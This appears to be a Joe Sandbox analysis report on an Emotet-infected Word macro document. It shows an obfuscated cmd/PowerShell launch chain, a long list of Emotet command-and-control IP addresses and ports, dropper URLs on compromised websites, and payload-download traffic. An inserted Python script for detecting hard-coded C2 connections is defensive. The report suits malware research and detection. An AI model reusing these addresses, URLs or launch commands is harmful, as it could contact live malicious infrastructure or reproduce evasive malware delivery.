

Analysis Report ARCHIVOFile-20-012021.doc

Overview

General Information

Sample Name: ARCHIVOFile-20-012021.doc
Analysis ID: 344894
MD5: d4829a31da294d0ee8f9f67bc1352bd2
SHA1: 70601272023fd5285194c68da776708508524d50
SHA256: 4fc909106f65c1ca7c9073743cbc8a7513a4ce7ae3d04e38bd01847e96aaf9f5


Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Document has an unknown application name
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1108 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2652 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc 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 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2564 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
      • rundll32.exe (PID: 1336 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
    • powershell.exe (PID: 2552 cmdline: powershell -w hidden -enc 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 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2364 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2360 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2460 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2484 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',UzhgGODQuLxptX MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2404 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lahhvjcxlgt\uxvrfyponi.bww',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 3032 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',Keza MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 3064 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bqdfivaeg\zraldnvj.leg',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1616 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',TsvDub MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2244 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Dhsrvrltshdb\kylwrasxsty.qky',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2380 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',ujMkapeydjSFMoJ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 2372 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fxyyidom\ykxlvrr.ddq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                            • rundll32.exe (PID: 2564 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Unveznmghbqlboho\gmfloxrovawmauo.idg',ANiwQWggq MD5: 51138BEEA3E2C21EC44D0932C71762A8)

Malware Configuration

Threatname: Emotet

{"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "51.15.7.145:80", "177.85.167.10:80", "186.177.174.163:80", "190.114.254.163:8080", "185.183.16.47:80", "149.202.72.142:7080", "181.30.61.163:443", "31.27.59.105:80", "50.28.51.143:8080", "68.183.190.199:8080", "85.214.26.7:8080", "137.74.106.111:7080", "200.75.39.254:80", "85.105.239.184:443", "190.45.24.210:80", "170.81.48.2:80", "109.101.137.162:8080", "110.39.160.38:443", "110.39.162.2:443", "91.233.197.70:80", "51.255.165.160:8080", "213.52.74.198:80", "12.162.84.2:8080", "82.208.146.142:7080", "60.93.23.51:80", "172.245.248.239:8080", "104.131.41.185:8080", "93.149.120.214:80", "81.214.253.80:443", "190.247.139.101:80", "46.105.114.137:8080", "70.32.115.157:8080", "202.134.4.210:7080", "212.71.237.140:8080", "177.23.7.151:80", "111.67.12.221:8080", "197.232.36.108:80", "190.162.232.138:80", "80.15.100.37:80", "95.76.153.115:80", "154.127.113.242:80", "188.225.32.231:7080", "5.196.35.138:7080", "211.215.18.93:8080", "46.101.58.37:8080", "82.48.39.246:80", "181.10.46.92:80", "190.251.216.100:80", "187.162.248.237:80", "191.223.36.170:80", "138.197.99.250:8080", "201.48.121.65:443", "78.206.229.130:80", "190.210.246.253:80", "68.183.170.114:8080", "87.106.46.107:8080", "122.201.23.45:443", "70.32.84.74:8080", "143.0.85.206:7080", "190.64.88.186:443", "217.13.106.14:8080", "93.146.143.191:80", "188.135.15.49:80", "178.211.45.66:8080", "138.97.60.141:7080", "81.17.93.134:80", "83.169.21.32:7080", "152.231.89.226:80", "80.249.176.206:80", "178.250.54.208:8080", "206.189.232.2:8080", "46.43.2.95:8080", "190.24.243.186:80", "105.209.235.113:8080", "62.84.75.50:80", "152.170.79.100:80", "209.236.123.42:8080", "185.94.252.27:443", "12.163.208.58:80", "152.169.22.67:80", "1.226.84.243:8080", "191.241.233.198:80", "94.176.234.118:443", "209.33.120.130:80", "45.16.226.117:443", "81.215.230.173:443", "172.104.169.32:8080", "201.185.69.28:443", "167.71.148.58:443", "192.175.111.212:7080"], "RSA 
Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.2222429242.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000012.00000002.2338162997.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
00000012.00000002.2336996681.0000000000290000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000E.00000002.2189259516.0000000010000000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
0000000A.00000002.2148553869.0000000000710000.00000040.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(5 of 31 entries shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
8.2.rundll32.exe.10000000.3.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
13.2.rundll32.exe.10000000.2.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
9.2.rundll32.exe.170000.0.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
8.2.rundll32.exe.10000000.3.raw.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
16.2.rundll32.exe.1d0000.1.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security |
(5 of 67 entries shown)

Sigma Overview

System Summary:

Sigma detected: Suspicious Call by Ordinal
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2360, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, ProcessId: 2460
Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis | Data: Command: powershell -w hidden -enc [base64-encoded command omitted]

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: https://norailya.com/drupal/retAl/ | Avira URL Cloud: Label: malware
Source: https://www.teelekded.com/cgi-bin/LPo/ | Avira URL Cloud: Label: malware
Source: http://calledtochange.org/CalledtoChange/8huSOd/ | Avira URL Cloud: Label: malware
Source: https://ummahstars.com/app_old_may_2018/assets/wDL8x/ | Avira URL Cloud: Label: malware
Source: https://hbprivileged.com/cgi-bin/Qg/ | Avira URL Cloud: Label: malware
Source: https://www.teelekded.com/cgi-bin/LPo/P | Avira URL Cloud: Label: malware
Found malware configuration
Source: 16.2.rundll32.exe.1d0000.1.unpack | Malware Configuration Extractor: Emotet (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for domain / URL
Source: hbprivileged.com | Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | Metadefender: Detection: 45%
Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | ReversingLabs: Detection: 85%
Multi AV Scanner detection for submitted file
Source: ARCHIVOFile-20-012021.doc | Virustotal: Detection: 48%
Source: ARCHIVOFile-20-012021.doc | ReversingLabs: Detection: 50%
Machine Learning detection for dropped file
Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | Joe Sandbox ML: detected
Source: 10.2.rundll32.exe.6a0000.0.unpack | Avira: Label: TR/ATRAPS.Gen

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown | HTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: global traffic | DNS query: name: riandutra.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 177.12.170.95:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 191.6.196.95:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49175 -> 84.232.229.24:80
Source: Traffic | Snort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49176 -> 51.255.203.164:8080
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor (IP list as given under Malware Configuration above)
Potential dropper URLs found in powershell memory
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://riandutra.com/email/AfhE8z0/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://calledtochange.org/CalledtoChange/8huSOd/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://norailya.com/drupal/retAl/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 51.255.203.164:8080
                      Source: global trafficHTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /CalledtoChange/8huSOd/ HTTP/1.1Host: calledtochange.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 191.6.196.95 191.6.196.95
                      Source: Joe Sandbox ViewASN Name: IPV6InternetLtdaBR IPV6InternetLtdaBR
                      Source: Joe Sandbox ViewASN Name: CRYSTALTECHUS CRYSTALTECHUS
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: unknownHTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
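The rows above record TCP sessions to 84.232.229.24 and to 51.255.203.164 (port 8080) for which the sandbox saw no DNS lookup: the addresses were hard-coded in the client, which is how Emotet carries its C2 list (IP:port pairs in the configuration) rather than hostnames. The correlator below is an added example written for this page, not part of the Joe Sandbox report: it replays DNS answers and TCP connects in time order and flags any connect whose destination was not returned by an earlier DNS answer, plus any non-web port. The event stream is constructed: the hostnames and the two direct-IP destinations are taken from the report, while the timestamps, the TEST-NET answer addresses, the "late.example" lookup and the port used for 84.232.229.24 are assumptions.

```python
from dataclasses import dataclass

STANDARD_WEB_PORTS = {80, 443}


@dataclass(frozen=True)
class Finding:
    ts: float
    dst: str
    port: int
    reasons: tuple


# Constructed event stream for this example, not the report's pcap. Hostnames and the
# two destinations reached without DNS (84.232.229.24, 51.255.203.164:8080) come from
# the report; timestamps, the 203.0.113.0/24 answer addresses, the "late.example"
# lookup and the port used for 84.232.229.24 are assumptions.
SAMPLE_EVENTS = [
    ("dns",  1.0, "riandutra.com", ["203.0.113.10"]),
    ("conn", 1.2, "203.0.113.10", 80),
    ("dns",  2.0, "calledtochange.org", ["203.0.113.20"]),
    ("conn", 2.1, "203.0.113.20", 80),
    ("conn", 3.0, "203.0.113.30", 443),   # the answer for this IP only arrives later
    ("dns",  3.5, "late.example", ["203.0.113.30"]),
    ("conn", 5.0, "84.232.229.24", 443),
    ("conn", 5.1, "84.232.229.24", 443),
    ("conn", 9.0, "51.255.203.164", 8080),
    ("conn", 9.2, "51.255.203.164", 8080),
]


def find_direct_ip_connections(events):
    """Replay DNS answers and TCP connects in time order. A connect whose destination
    was never returned by an earlier DNS answer means the client already had the
    address (hard-coded C2); a non-web port is a second, independent signal."""
    resolved = {}          # ip -> first hostname that resolved to it
    findings = []
    for ev in sorted(events, key=lambda e: e[1]):
        if ev[0] == "dns":
            _, _, name, answers = ev
            for ip in answers:
                resolved.setdefault(ip, name)
        elif ev[0] == "conn":
            _, ts, dst, port = ev
            reasons = []
            if dst not in resolved:
                reasons.append("no preceding DNS answer for destination")
            if port not in STANDARD_WEB_PORTS:
                reasons.append(f"non-standard port {port}")
            if reasons:
                findings.append(Finding(ts, dst, port, tuple(reasons)))
    return findings


def summarize(findings):
    """One row per (dst, port) with a hit count and the union of reasons; the report
    lists the same C2 address six times and the tally is what an analyst wants."""
    rows = {}
    for f in findings:
        row = rows.setdefault((f.dst, f.port), {"count": 0, "reasons": set()})
        row["count"] += 1
        row["reasons"].update(f.reasons)
    return rows


if __name__ == "__main__":
    for (dst, port), row in sorted(summarize(find_direct_ip_connections(SAMPLE_EVENTS)).items()):
        print(f"{dst}:{port}  hits={row['count']}  {'; '.join(sorted(row['reasons']))}")
```

The ordering check matters: a DNS answer that arrives after the connect (the constructed 203.0.113.30 case) does not explain it. In production, seed `resolved` from the host's DNS cache or from earlier captures and account for DNS-over-HTTPS, otherwise legitimately cached destinations show up as direct-IP connects.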
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmp
                      Source: global trafficHTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /CalledtoChange/8huSOd/ HTTP/1.1Host: calledtochange.orgConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2102409234.000000000029B000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: riandutra.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 11:17:36 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmpString found in binary or memory: http://calledtochange.org
                      Source: powershell.exe, 00000005.00000002.2108073552.0000000002C95000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in binary or memory: http://calledtochange.org/CalledtoChange/8huSOd/
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                      Source: powershell.exe, 00000005.00000003.2102092441.000000001B63D000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                      Source: powershell.exe, 00000005.00000002.2111878141.000000001B64C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1814.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
                      Source: powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                      Source: powershell.exe, 00000005.00000002.2111861620.000000001B61E000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                      Source: powershell.exe, 00000005.00000003.2101978050.000000001B631000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                      Source: powershell.exe, 00000005.00000003.2092182578.000000001D0FC000.00000004.00000001.sdmpString found in binary or memory: http://crl.use
                      Source: powershell.exe, 00000005.00000002.2109037300.0000000003190000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                      Source: powershell.exe, 00000005.00000002.2102387342.0000000000274000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                      Source: powershell.exe, 00000005.00000003.2101935876.000000001D06A000.00000004.00000001.sdmp, powershell.exe, 00000005.00000003.2101956374.000000001B5FD000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2111811084.000000001B582000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
